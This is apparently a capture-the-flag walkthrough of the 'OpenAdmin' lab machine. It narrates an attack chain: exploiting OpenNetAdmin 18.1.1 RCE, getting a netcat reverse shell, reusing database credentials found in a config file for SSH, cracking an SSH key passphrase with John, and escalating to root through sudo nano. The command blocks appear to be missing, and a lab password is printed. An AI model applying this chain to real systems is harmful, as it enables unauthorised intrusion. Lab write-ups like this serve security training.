OpenAdmin
Last updated
Last updated
Checking port 80 we find the root page directs us to the default Apache 2 install web page.
Running dirsearch.py against the target we find multiple directories:
I manually looked through the discovered directories which pulled webpages. However I was unable to identify any interesting information contained in these pages.
I then started OWASP ZAP and ran a active spider against the site. ZAP soon picks up the sub page of /ona.
Browsing to /ona:
We see from the header in the tab this is 'OpenNatAdmin'. From the webpage we can see we are running version v18.1.1
What is OpenNetAdmin?
OpenNetAdmin is a system for tracking IP network attributes in a database. A web interface is provided to administer the data, and there is a fully functional CLI interface for batch management (for those of you who prefer NOT to use a GUI). There are also several backend processes for building DHCP, DNS, router configuration, etc.
Checking searchsploit for known exploits we get results for a RCE.
Further exploit searching shows a reliable Python exploit for OpenNetAdmin:
Clone the respository:
Then execute the script:
Whilst we do have shell this one is bound to the current directory and as such we cannot easily navigate the target system. To resolve this first I checked available useful software on the target system.
Which shows nc as being on the target system. I then set a netcat listener on my attacking machine to port 443.
Then executed the following netcat reverse shell on the target system:
Now we have a full reverse shell. After some manual enumeration I found some interesting information in /opt/ona/www/local/config/database_settings.inc.php.
We have discovered the following MySQL credentials: ona_sys:n1nj4W4rri0R! We can also check for password reuse. Looking at the home directory we have two users: jimmy and joanna.
I tried using SSH as jimmy and was given access with the password above.
From here further enumeration again shows a directory named 'internal' only accessible to jimmy and members of the internal group.
Then the following files inside the directory:
Checking the contents of main:
Looks like when the PHP file is executed it will retrieve Joanna's SSH key. We know this directory is not under the normal port 80.
Checking netstat we see something is running locally on port 52846.
Running curl against the local port and main.php gives us a valid result.
Copy the key to the attacking machine and set correct key permissions:
As we can see from the line 'Proc-Type: 4,ENCRYPTED' we will need a password to authorize against the key when connecting over SSH.
We can use ssh2john.py we generate a hash from this keyfile then crack with John.
The crack with John.
We can then use SSH and login as joanna after specifying and authorizing against the SSH key. Using the password found above in John to proceed when asked for a passphrase
Checking sudo -l for sudo privileges we see that we can run /bin/nano /opt/priv as anyone without providing a password.
Checking nano against GTFOBins we see we can spawn a shell with the nano binary.
To spawn a root shell run the following command:
When in a nano editor press the following keys:
